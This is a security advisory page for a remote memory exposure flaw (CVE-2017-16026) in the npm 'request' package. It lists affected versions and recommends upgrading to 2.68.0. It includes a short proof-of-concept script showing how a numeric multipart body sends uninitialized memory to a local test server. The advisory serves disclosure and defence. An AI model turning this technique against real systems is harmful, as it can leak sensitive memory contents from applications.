Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTd4ZnAtOWM1NS01dnFq

Moderate EPSS: 0.00815% (0.73565 Percentile) EPSS:
Permalink JSON

Remote Memory Exposure in request

Affected Packages Affected Versions Fixed Versions
npm:request
PURL: pkg:npm/request
>= 2.2.6, < 2.47.0, >= 2.49.0, < 2.68.0 2.68.0, 2.68.0
58,231 Dependent packages
847,768 Dependent repositories
62,108,206 Downloads last month

Affected Version Ranges

All affected versions

2.2.6, 2.2.9, 2.9.0, 2.9.1, 2.9.2, 2.9.3, 2.9.100, 2.9.150, 2.9.151, 2.9.152, 2.9.153, 2.9.200, 2.9.201, 2.9.202, 2.9.203, 2.10.0, 2.11.0, 2.11.1, 2.11.2, 2.11.3, 2.11.4, 2.12.0, 2.14.0, 2.16.0, 2.16.2, 2.16.4, 2.16.6, 2.18.0, 2.19.0, 2.20.0, 2.21.0, 2.22.0, 2.23.0, 2.24.0, 2.25.0, 2.26.0, 2.27.0, 2.28.0, 2.29.0, 2.30.0, 2.31.0, 2.32.0, 2.33.0, 2.34.0, 2.35.0, 2.36.0, 2.37.0, 2.38.0, 2.39.0, 2.40.0, 2.41.0, 2.42.0, 2.43.0, 2.44.0, 2.45.0, 2.46.0, 2.49.0, 2.50.0, 2.51.0, 2.52.0, 2.53.0, 2.54.0, 2.55.0, 2.56.0, 2.57.0, 2.58.0, 2.59.0, 2.60.0, 2.61.0, 2.62.0, 2.63.0, 2.64.0, 2.65.0, 2.66.0, 2.67.0

All unaffected versions

0.8.3, 0.9.0, 0.9.1, 0.9.5, 0.10.0, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.5, 1.9.7, 1.9.8, 1.9.9, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1, 2.2.0, 2.2.5, 2.47.0, 2.48.0, 2.68.0, 2.69.0, 2.70.0, 2.71.0, 2.72.0, 2.73.0, 2.74.0, 2.75.0, 2.76.0, 2.77.0, 2.78.0, 2.79.0, 2.80.0, 2.81.0, 2.82.0, 2.83.0, 2.84.0, 2.85.0, 2.86.0, 2.87.0, 2.88.0, 2.88.2

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
	req.on('data', function (data) {
            console.log(data)
        });
	res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
	method: "POST",
	uri: 'http://localhost:8000',
	multipart: [{body:500}]
},function(err,res,body){});

Recommendation

Update to version 2.68.0 or later

References:

Identifiers

GHSA-7xfp-9c55-5vqj

CVE-2017-16026

Risk

Severity

Moderate

EPSS

EPSS Percentage: 0.00815

EPSS Percentile: 0.73565

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/request/request

Date and time

Published

almost 7 years ago

Updated

about 2 years ago

API

JSON